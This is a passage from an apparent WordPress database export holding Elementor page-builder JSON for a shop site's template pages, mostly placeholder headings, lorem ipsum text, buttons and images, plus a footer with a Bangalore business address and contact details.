here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"50ce1c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#C3C3C321\"},\"elements\":[{\"id\":\"6cb9f56\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":0},\"elements\":[{\"id\":\"d4fc894\",\"elType\":\"widget\",\"settings\":{\"view\":\"\",\"icon_list\":[{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"99391c3\"},{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"de33d81\"},{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"4bd4895\"},{\"text\":\"List Item #2\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"6156b25\"},{\"text\":\"List Item #3\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"59990f4\"}],\"icon_align\":\"center\",\"divider\":\"yes\",\"divider_style\":\"dotted\",\"divider_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"32\",\"bottom\":\"32\",\"left\":\"32\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"0e3e07c\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"c2e40a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8482,1485,'_elementor_page_assets','a:0:{}'),(8485,1486,'_elementor_edit_mode','builder'),(8486,1486,'_elementor_template_type','wp-page'),(8487,1486,'_elementor_version','3.7.7'),(8488,1486,'_wp_page_template','elementor_canvas'),(8489,1486,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"50ce1c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#C3C3C321\"},\"elements\":[{\"id\":\"6cb9f56\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":0},\"elements\":[{\"id\":\"d4fc894\",\"elType\":\"widget\",\"settings\":{\"view\":\"\",\"icon_list\":[{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"99391c3\"},{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"de33d81\"},{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"4bd4895\"},{\"text\":\"List Item #2\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"6156b25\"},{\"text\":\"List Item #3\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"59990f4\"}],\"icon_align\":\"center\",\"divider\":\"yes\",\"divider_style\":\"dotted\",\"divider_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"32\",\"bottom\":\"32\",\"left\":\"32\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"0e3e07c\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"c2e40a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 